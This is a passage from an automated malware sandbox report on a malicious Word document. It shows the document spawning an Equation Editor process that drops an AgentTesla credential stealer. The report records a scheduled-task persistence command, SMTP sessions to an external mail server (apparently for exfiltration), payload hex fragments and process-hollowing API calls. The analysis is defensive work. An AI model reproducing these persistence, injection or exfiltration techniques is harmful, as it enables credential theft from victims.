Feb 8, 2021 10:28:18.852761984 CET	3	IN	Data Raw: 16 2b 19 25 28 26 00 00 0a 13 04 11 04 6f 27 00 00 0a 14 fe 03 13 05 11 05 16 fe 03 fe 11 26 72 3b 00 00 70 17 8d 18 00 00 01 25 16 11 04 6f 27 00 00 0a 6f 28 00 00 0a a2 28 21 00 00 0a 13 06 11 06 11 04 6f 27 00 00 0a 73 29 00 00 0a 7a 00 7e 06 Data Ascii: +%(&o'&r;p%o'o((!o's)z~(o+1aZo+&(,0(-(.+0(/+0
Feb 8, 2021 10:28:18.852811098 CET	4	IN	Data Raw: 00 0a 8c 08 00 00 1b 14 fe 01 0b 07 2c 0a 28 1a 00 00 2b 80 34 00 00 0a 7e 34 00 00 0a 0a 2b 00 06 2a 00 00 26 00 02 28 2c 00 00 0a 00 2a 00 00 26 00 02 28 2c 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 0d 00 00 11 00 7e 14 00 00 04 14 28 36 00 Data Ascii: ,(+4~4+&(,&(,0<~(6,!rp(o7s8~+0~+"0&(4rp~o9(-t'+*0<~(6
Feb 8, 2021 10:28:18.852861881 CET	6	IN	Data Raw: 00 0a 13 04 16 0c 02 7b 1e 00 00 04 6f 60 00 00 0a 13 08 38 4c 01 00 00 12 08 28 61 00 00 0a 13 09 11 04 12 09 28 69 00 00 0a 6f 6a 00 00 0a 00 28 09 00 00 06 6f 1c 00 00 06 7b 0b 01 00 04 13 0a 11 0a 39 df 00 00 00 09 12 09 28 69 00 00 0a 18 9a Data Ascii: {o`8L(a(ioj(o{9(iok9(ol(o{7rp(mon,*(ol(o{7rp(moo(ol(i(o{7rp(i(poq
Feb 8, 2021 10:28:18.852900028 CET	7	IN	Data Raw: 00 00 04 2b 00 2a 00 00 22 02 03 7d 2a 00 00 04 2a 00 00 00 22 7e 2b 00 00 04 2b 00 2a 00 00 00 1e 02 80 2b 00 00 04 2a 22 7e 2c 00 00 04 2b 00 2a 00 00 00 1e 02 80 2c 00 00 04 2a 26 02 7b 2d 00 00 04 2b 00 2a 00 00 22 02 03 7d 2d 00 00 04 2a 00 Data Ascii: +"}"~+++"~,+,&{-+"}-&{.+"}.&{/+"}/"~0+0(,0(o(g&*0Lrpoo%~!
Feb 8, 2021 10:28:18.852940083 CET	8	IN	Data Raw: 06 20 ba 00 00 00 20 b3 00 00 00 73 50 00 00 0a 6f 51 00 00 0a 00 02 6f 76 00 00 06 72 33 04 00 70 6f 52 00 00 0a 00 02 6f 76 00 00 06 1f 6e 1f 23 73 53 00 00 0a 6f 54 00 00 0a 00 02 6f 76 00 00 06 1a 6f 55 00 00 0a 00 02 6f 76 00 00 06 72 47 04 Data Ascii: sPoQovr3poRovn#sSoTovoUovrGpoovo"@"PAsV(W(X sS(Y(Zovo[(Zoto[(Zoro[(Zopo[(Zono[
Feb 8, 2021 10:28:18.852978945 CET	10	IN	Data Raw: 97 00 00 06 00 02 73 b5 00 00 0a 6f 99 00 00 06 00 02 73 b6 00 00 0a 6f 9b 00 00 06 00 02 73 97 00 00 0a 6f 9d 00 00 06 00 02 28 4f 00 00 0a 00 02 6f 7e 00 00 06 72 e5 04 00 70 22 00 00 10 41 16 19 16 73 99 00 00 0a 6f 9a 00 00 0a 00 02 6f 7e 00 Data Ascii: sososo(Oo~rp"Asoo~ !sPoQo~rpoRo~KsSoTo~oUo~rpoo~oooorp"AsootQsP
Feb 8, 2021 10:28:18.853018045 CET	11	IN	Data Raw: 37 00 00 00 1a 00 00 11 02 fe 06 9f 00 00 06 73 47 00 00 0a 0a 02 7b 43 00 00 04 0b 07 2c 07 07 06 6f c0 00 00 0a 02 03 7d 43 00 00 04 02 7b 43 00 00 04 0b 07 2c 07 07 06 6f c1 00 00 0a 2a 00 26 02 7b 44 00 00 04 2b 00 2a 00 00 13 30 02 00 37 00 Data Ascii: 7sG{C,o}C{C,o&{D+07sG{D,o}D{D,o&{E+07sG{E,o}E{E,o&{F+"}F
Feb 8, 2021 10:28:18.853060007 CET	13	IN	Data Raw: 9d 00 00 0a 00 02 6f ac 00 00 06 17 6f 9e 00 00 0a 00 02 6f ae 00 00 06 72 e5 04 00 70 22 00 00 1c 41 16 19 16 73 99 00 00 0a 6f 9a 00 00 0a 00 02 6f ae 00 00 06 20 c6 00 00 00 20 2a 01 00 00 73 50 00 00 0a 6f 51 00 00 0a 00 02 6f ae 00 00 06 72 Data Ascii: ooorp"Asoo *sPoQorpoRoKsSoTooUorpooo"@"PAsV(W(X sS(Y(Zoo[(Zoo[
Feb 8, 2021 10:28:19.057574987 CET	14	IN	Data Raw: 09 00 70 6f ce 00 00 0a 00 06 72 6d 06 00 70 6f da 00 00 0a 00 06 72 72 09 00 70 6f cf 00 00 0a 00 00 06 6f a8 00 00 0a 26 06 6f d1 00 00 0a 80 9e 00 00 04 02 7e 9e 00 00 04 28 db 00 00 0a 74 27 00 00 01 7d 5b 00 00 04 02 6f f7 00 00 06 02 7b 5b Data Ascii: pormporrpoo&o~(t'}[o{[oooooo%(&(*-Z0y%~rmp(s,No{_rp(oooorm
Feb 8, 2021 10:28:19.057729959 CET	16	IN	Data Raw: 73 f4 00 00 0a 6f e0 00 00 06 00 02 73 f4 00 00 0a 6f e2 00 00 06 00 02 73 f4 00 00 0a 6f e4 00 00 06 00 02 73 f5 00 00 0a 6f ea 00 00 06 00 02 73 f4 00 00 0a 6f ec 00 00 06 00 02 73 f4 00 00 0a 6f e6 00 00 06 00 02 73 f4 00 00 0a 6f e8 00 00 06 Data Ascii: sosososososososososososososososososososos

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Feb 8, 2021 10:29:16.280077934 CET	587	49168	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Feb 8, 2021 10:29:16.280643940 CET	49168	587	192.168.2.22	198.54.122.60	EHLO 783875
Feb 8, 2021 10:29:16.469336987 CET	587	49168	198.54.122.60	192.168.2.22	250-MTA-06.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 8, 2021 10:29:16.470200062 CET	49168	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 8, 2021 10:29:16.659040928 CET	587	49168	198.54.122.60	192.168.2.22	220 Ready to start TLS
Feb 8, 2021 10:29:22.416186094 CET	587	49169	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Feb 8, 2021 10:29:22.416733027 CET	49169	587	192.168.2.22	198.54.122.60	EHLO 783875
Feb 8, 2021 10:29:22.605782032 CET	587	49169	198.54.122.60	192.168.2.22	250-MTA-06.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 8, 2021 10:29:22.606370926 CET	49169	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 8, 2021 10:29:22.795337915 CET	587	49169	198.54.122.60	192.168.2.22	220 Ready to start TLS
Feb 8, 2021 10:29:30.349409103 CET	587	49171	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Feb 8, 2021 10:29:30.350186110 CET	49171	587	192.168.2.22	198.54.122.60	EHLO 783875
Feb 8, 2021 10:29:30.538182974 CET	587	49171	198.54.122.60	192.168.2.22	250-MTA-06.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 8, 2021 10:29:30.538736105 CET	49171	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 8, 2021 10:29:30.726928949 CET	587	49171	198.54.122.60	192.168.2.22	220 Ready to start TLS
Feb 8, 2021 10:29:39.634231091 CET	587	49172	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Feb 8, 2021 10:29:39.634582043 CET	49172	587	192.168.2.22	198.54.122.60	EHLO 783875
Feb 8, 2021 10:29:39.822638035 CET	587	49172	198.54.122.60	192.168.2.22	250-MTA-06.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 8, 2021 10:29:39.823504925 CET	49172	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 8, 2021 10:29:40.011332035 CET	587	49172	198.54.122.60	192.168.2.22	220 Ready to start TLS
Feb 8, 2021 10:29:49.827069044 CET	587	49173	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Feb 8, 2021 10:29:49.827635050 CET	49173	587	192.168.2.22	198.54.122.60	EHLO 783875
Feb 8, 2021 10:29:50.016246080 CET	587	49173	198.54.122.60	192.168.2.22	250-MTA-06.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 8, 2021 10:29:50.016700029 CET	49173	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 8, 2021 10:29:50.206713915 CET	587	49173	198.54.122.60	192.168.2.22	220 Ready to start TLS
Feb 8, 2021 10:29:56.330127954 CET	587	49174	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Feb 8, 2021 10:29:56.330699921 CET	49174	587	192.168.2.22	198.54.122.60	EHLO 783875
Feb 8, 2021 10:29:56.519401073 CET	587	49174	198.54.122.60	192.168.2.22	250-MTA-06.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 8, 2021 10:29:56.519946098 CET	49174	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 8, 2021 10:29:56.711216927 CET	587	49174	198.54.122.60	192.168.2.22	220 Ready to start TLS

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 1492 Parent PID: 584

General

Start time:	10:27:39
Start date:	08/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f2e0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2512 Parent PID: 584

General

Start time:	10:27:40
Start date:	08/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: pridingnsjhfhdjs.exe PID: 260 Parent PID: 2512

General

Start time:	10:28:00
Start date:	08/02/2021
Path:	C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
Imagebase:	0xc90000
File size:	734720 bytes
MD5 hash:	CEDD3570A65CE74199167DA6E5190CC4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2139955625.0000000002471000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2140668644.0000000003479000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2916 Parent PID: 260

General

Start time:	10:28:04
Start date:	08/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp'
Imagebase:	0x4c0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: pridingnsjhfhdjs.exe PID: 912 Parent PID: 260

General

Start time:	10:28:04
Start date:	08/02/2021
Path:	C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
Imagebase:	0xc90000
File size:	734720 bytes
MD5 hash:	CEDD3570A65CE74199167DA6E5190CC4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2394346599.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: pridingnsjhfhdjs.exe PID: 260 Parent PID: 2512 pridingnsjhfhdjs.exeCOMMON

Executed Functions

Function 00330EA8, Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

tEm, xrefs: 003316EA

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID: tEm
API String ID: 0-3333056351
Opcode ID: 95991d210d1038be6de23228bec34cce595bb9e57c2322789afc530716ff4fb9
Instruction ID: 797d3a898ddea489c254ac016eba323b2fab58bf70e4f20c3c8ddf71b84d20c0
Opcode Fuzzy Hash: 95991d210d1038be6de23228bec34cce595bb9e57c2322789afc530716ff4fb9
Instruction Fuzzy Hash: A8D10070D05228CFDB15DFA5C894BEEBBB6BF8A300F1485AAD409BB251D7345A85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0033D3BD, Relevance: 1.5, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

(, xrefs: 0033D3ED

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 09d4531039919931dd7e4369b964abafe01a76da825cbaf61253fdfc4eaabd89
Instruction ID: a0dd85a8af303475d1dd0d3a1eb6257280e58a8711ff5294c29aa41e9ffe194b
Opcode Fuzzy Hash: 09d4531039919931dd7e4369b964abafe01a76da825cbaf61253fdfc4eaabd89
Instruction Fuzzy Hash: 1BE1DC74901228CFDB65DF68D984BEDBBB1AB4A315F1084EAD509AB291CB309EC5CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0033D2FF, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7c645412175051b9dca124cc453bb028a0b8c4651742a3b9ab705cb44a69696
Instruction ID: fe153a5a7aa6a9e07bd51f923d9e074efff83abfd2739cc8ab2f13c89dbaea76
Opcode Fuzzy Hash: b7c645412175051b9dca124cc453bb028a0b8c4651742a3b9ab705cb44a69696
Instruction Fuzzy Hash: 3FD1EF74D05228CFDB65DF64D885BEDBBB5AF4A304F1080EAD509AB291DB709E85CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0033D875, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d51bf896e7b22ec44f6f132d337a32b0bcbabda86bc44d7a8daa355e3d44034a
Instruction ID: ff1f0c12f86a2c83fcd9f349dddab0a71386bedbdd455d6b7c4f938466ab9e02
Opcode Fuzzy Hash: d51bf896e7b22ec44f6f132d337a32b0bcbabda86bc44d7a8daa355e3d44034a
Instruction Fuzzy Hash: A3C1ED70D012288FDB65DF64D985BEDBBB1AB4A305F0080EAD50DAB291CB309EC5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0033AB18, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc2031f827b3f5c694517bca29f16cbc487dede702650e587bf960994c3c629
Instruction ID: 4b59db44cfa379fdc1be952190acc779df238971d18713b8a772fdf4f03b186c
Opcode Fuzzy Hash: 3fc2031f827b3f5c694517bca29f16cbc487dede702650e587bf960994c3c629
Instruction Fuzzy Hash: 479100B4E006098FCB04CFE9C480AEEBBF6AF88305F648529D559AB755EB349D41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00332D78, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23024f3b0fe755d143380707ed25da939d05f1c31c0241fdc75895da8f9c39f0
Instruction ID: a941474d590ed99be9d438393638c9632766540766d4c4790cd856a9f8c059ce
Opcode Fuzzy Hash: 23024f3b0fe755d143380707ed25da939d05f1c31c0241fdc75895da8f9c39f0
Instruction Fuzzy Hash: 17912670E00218CFDF15DFA9C881BDEBBB6BF98315F60C469D608AB205DB345A858F51

Uniqueness

Uniqueness Score: -1.00%

Function 0033AB08, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 528cc81e1ea90dee6f4c706509fa6703844f1f841dc73bf4d4132d8067e9a76a
Instruction ID: 06f664ad9c83e6eeb2b1a60ca8a53159b986e54ba45403c74a259abf085dd0e8
Opcode Fuzzy Hash: 528cc81e1ea90dee6f4c706509fa6703844f1f841dc73bf4d4132d8067e9a76a
Instruction Fuzzy Hash: 9C511174E046088FDB04CFAAC580AEEBBF6AF88301F64C52AD558AB715EB349D41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0033D858, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ddd90417a5cd00655c6c484df872b4e727f635504ca8765a700a74b01e2ecc
Instruction ID: ab764fedadfab920e42b6c58f5f0287407d957848fdf496bc311a73091aa46d3
Opcode Fuzzy Hash: 57ddd90417a5cd00655c6c484df872b4e727f635504ca8765a700a74b01e2ecc
Instruction Fuzzy Hash: FD51BD74D02228CFDB65DF68D985BECBBB1AB4A315F1180EAD509A7251CB305EC5CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0033BC41, Relevance: 1.8, APIs: 1, Instructions: 287processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0033BE6F

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4f8f21a4361074ac97ff738e03a0084b9e50b8954d5eb2484f46b7253d4f30fb
Instruction ID: cff74fcb65d4a56162ce0b14495667e661d3204fe4e87e4143bf635047bd7740
Opcode Fuzzy Hash: 4f8f21a4361074ac97ff738e03a0084b9e50b8954d5eb2484f46b7253d4f30fb
Instruction Fuzzy Hash: 70A11270D002698FCF21CFA4C881BEDBBB6BF05308F1095A9E959B7250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0033B808, Relevance: 1.6, APIs: 1, Instructions: 120injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0033B8E3

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: aa7717b61cfd9bd277501e6e55ca7808b91d11fd04ae12518c6e5d45d0534e1d
Instruction ID: 5c2e8d873256d1e9f3819ddafbad760839bf60aba74d0ef58b1ac598f3bdef03
Opcode Fuzzy Hash: aa7717b61cfd9bd277501e6e55ca7808b91d11fd04ae12518c6e5d45d0534e1d
Instruction Fuzzy Hash: 394198B4D012489FCF00CFA9D984AEEFBF1BB49314F24942AE915BB210D734AA55CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0033B810, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0033B8E3

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5b31348b608b3ae5beed1b083dc3ae18db7af01c06d641a9c27d8f9fca858548
Instruction ID: 1c15441665c95835beb394c8a63f422faafd1181eff1890af2b3658f9bb5b340
Opcode Fuzzy Hash: 5b31348b608b3ae5beed1b083dc3ae18db7af01c06d641a9c27d8f9fca858548
Instruction Fuzzy Hash: BB41ABB4D012489FCF00CFA9D984AEEFBF5BB49314F20942AE914BB200D734AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0033B968, Relevance: 1.6, APIs: 1, Instructions: 109COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0033BA22

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2da48f3b8548257e1c190bf25ab480b6d165a1849d6be96f12579729b236388d
Instruction ID: f34b08f85d11984662bf6e0b602c06c807e69a9b055ffbc5fcde120d32f7ad0e
Opcode Fuzzy Hash: 2da48f3b8548257e1c190bf25ab480b6d165a1849d6be96f12579729b236388d
Instruction Fuzzy Hash: E341B9B8D00258DFCF00CFA9D884AEEFBB1BB49314F14942AE915BB200D734A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0033B970, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0033BA22

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4cd925bddfb00c82bded4325b837518950f5a2782eb960bedc746a1e1ec1faac
Instruction ID: 1275743a15ff93844a3544ab251ce7933476882752844a46087ba9e2b995d4f7
Opcode Fuzzy Hash: 4cd925bddfb00c82bded4325b837518950f5a2782eb960bedc746a1e1ec1faac
Instruction Fuzzy Hash: 0E4198B8D002589FCF10CFE9D884AEEFBB5BB49314F10942AE915B7200D735A955CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0033B6E0, Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0033B792

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 368af98d91d233e938f11e6737213c82ead9d8f0651262db37ed8e47d2bb6e0d
Instruction ID: a48ba828ce366a61d89b628192a519b68f09fd7a067748275a57b276890200c8
Opcode Fuzzy Hash: 368af98d91d233e938f11e6737213c82ead9d8f0651262db37ed8e47d2bb6e0d
Instruction Fuzzy Hash: 3D4198B8D002489FCF10CFA9D880ADEFBB1EF4A314F24942AE915BB250D735A906CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0033B6E8, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0033B792

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 143675f3734dde0a0e2e3a30106b514131cdd8ae62f35c9ab53ba0cce43c689a
Instruction ID: 03409e313e3b48f51bec189f9ed18f19c867e75fc004047b9e079d561d4dab34
Opcode Fuzzy Hash: 143675f3734dde0a0e2e3a30106b514131cdd8ae62f35c9ab53ba0cce43c689a
Instruction Fuzzy Hash: 194168B8D002589BCF10CFA9D884ADEFBB5EF49314F20942AE915BB210D735A916CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0033B5B0, Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0033B667

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1653b83e69289c61a2359610a6fdf49e936fbe2a1d95e611320c981d19a6f481
Instruction ID: 0b284a7dab411c6260a872be59512f90ee4b05286ab57224d805508345e8e027
Opcode Fuzzy Hash: 1653b83e69289c61a2359610a6fdf49e936fbe2a1d95e611320c981d19a6f481
Instruction Fuzzy Hash: 4541BCB5D002589FCB10CFA9D885AEEFBF1BB49314F24942AE414B7240D778A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0033B5B8, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0033B667

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5917647028d3b3960b8a18a69bb49565033c68c48b0fac50a58bf3e0852f9e01
Instruction ID: e144f8cbf74fea0f6477e794bee11252e3c63916ef706b237b86eeaecbc37f16
Opcode Fuzzy Hash: 5917647028d3b3960b8a18a69bb49565033c68c48b0fac50a58bf3e0852f9e01
Instruction Fuzzy Hash: 4C41AAB4D002589FCB14CFA9D885AEEFBF5BB49314F24842AE819B7240D738A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0033B4C2, Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0033B546

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 03f166c5305d6a9445cdab53d0a4be0a493baeb990b402e9de9c3edc806a040d
Instruction ID: 7f96e28e0fb6c5c50bde9a514f0609db288f8703ecd804ef67e7dda4e1f71b1a
Opcode Fuzzy Hash: 03f166c5305d6a9445cdab53d0a4be0a493baeb990b402e9de9c3edc806a040d
Instruction Fuzzy Hash: CA31AAB4D012589FCF14CFA9D884ADEFBB5EB4A314F24982AE915B7300D735A902CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0033B4C8, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0033B546

Memory Dump Source

Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 95fc34a2710936b61a12a4cdf39ed0dd32e15ec210f24f1cd5437429d88da7d6
Instruction ID: d67ff8841676908345d89b46b89daa1dc02b0d2c3c33df9812b5a8b285f8a480
Opcode Fuzzy Hash: 95fc34a2710936b61a12a4cdf39ed0dd32e15ec210f24f1cd5437429d88da7d6
